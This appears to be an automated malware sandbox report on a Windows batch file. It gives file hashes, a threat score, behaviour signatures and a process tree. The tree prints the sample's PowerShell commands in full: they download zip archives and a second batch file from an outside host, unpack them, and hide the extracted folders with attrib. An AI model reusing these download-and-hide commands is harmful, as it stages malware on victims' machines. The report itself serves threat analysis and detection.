Analysis

  • max time kernel: 122s
  • max time network: 122s
  • platform: windows7_x64
  • resource: win7-20240903-en
  • resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted: 02-10-2024 01:59

General

  • Target: 02102024_0159_new.bat
  • Size: 17.0MB
  • MD5: 3a6a863c82f5ad5ff271a7c740c1ab88
  • SHA1: a85966b120a257211a5f2a245ac94244d5a77019
  • SHA256: bc8ad4687d5b06fbcd16b1a119b0cec10b8063ff0154dcacc6e3e30a5ce9f2ba
  • SHA512: 79f8309de480b45d21520f18180ade1367217955e8e6e50b1251b28921bd8a5f2382382c21a5ef556282fb37dabb7337425a3bd658d10f8d417c5b21e022e10d
  • SSDEEP: 768:U6MPI1xfXAU2HVp93Cs5MJVBIkCm6M2EHC5w+wLfm6/95h65uvh3E1cQAAaBq3If:U145

Score
8/10

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Powershell Invoke Web Request.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\02102024_0159_new.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2328
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipmng.site:9006/DXJS.zip' -OutFile 'C:\Users\Admin\Downloads\DXJS.zip' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2228
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\DXJS.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1596
    • C:\Windows\system32\timeout.exe
      timeout /t 5 REM Wait for extraction to finish (adjust timeout as needed)
      2⤵
      • Delays execution with timeout.exe
      PID:2736
    • C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\Downloads\Python"
      2⤵
      • Views/modifies file attributes
      PID:2768
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipmng.site:9006/startupppp.bat' -OutFile 'C:\Users\Admin\Downloads\startupppp.bat' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2784
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipmng.site:9006/FTSP.zip' -OutFile 'C:\Users\Admin\Downloads\FTSP.zip' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2080
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\FTSP.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2952
    • C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\Downloads\Print"
      2⤵
      • Views/modifies file attributes
      PID:2632

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize: 7KB
    MD5: 3d93be3762fdae0c03d225a921618c19
    SHA1: b2e972b17c184550a61ff7bd2101126b0b7bfdc2
    SHA256: 0992bd22ee28dc52633d4f47a168dd271779b4303c6da7c7ea5b88cf6952cef6
    SHA512: b3c41b03699ee737d07484bb92528d162cf6b94ee81df02b249d66920b4bac7332a27ae723a11957d357a16f346d6e7d0312bc785aaf2fa91d626680aa405451
  • memory/1596-17-0x000000001B6A0000-0x000000001B982000-memory.dmp
    Filesize: 2.9MB
  • memory/1596-18-0x0000000001D80000-0x0000000001D88000-memory.dmp
    Filesize: 32KB
  • memory/2228-4-0x000007FEF64CE000-0x000007FEF64CF000-memory.dmp
    Filesize: 4KB
  • memory/2228-5-0x000000001B710000-0x000000001B9F2000-memory.dmp
    Filesize: 2.9MB
  • memory/2228-7-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp
    Filesize: 9.6MB
  • memory/2228-6-0x0000000002240000-0x0000000002248000-memory.dmp
    Filesize: 32KB
  • memory/2228-8-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp
    Filesize: 9.6MB
  • memory/2228-9-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp
    Filesize: 9.6MB
  • memory/2228-11-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp
    Filesize: 9.6MB
  • memory/2228-10-0x000000000227B000-0x00000000022E2000-memory.dmp
    Filesize: 412KB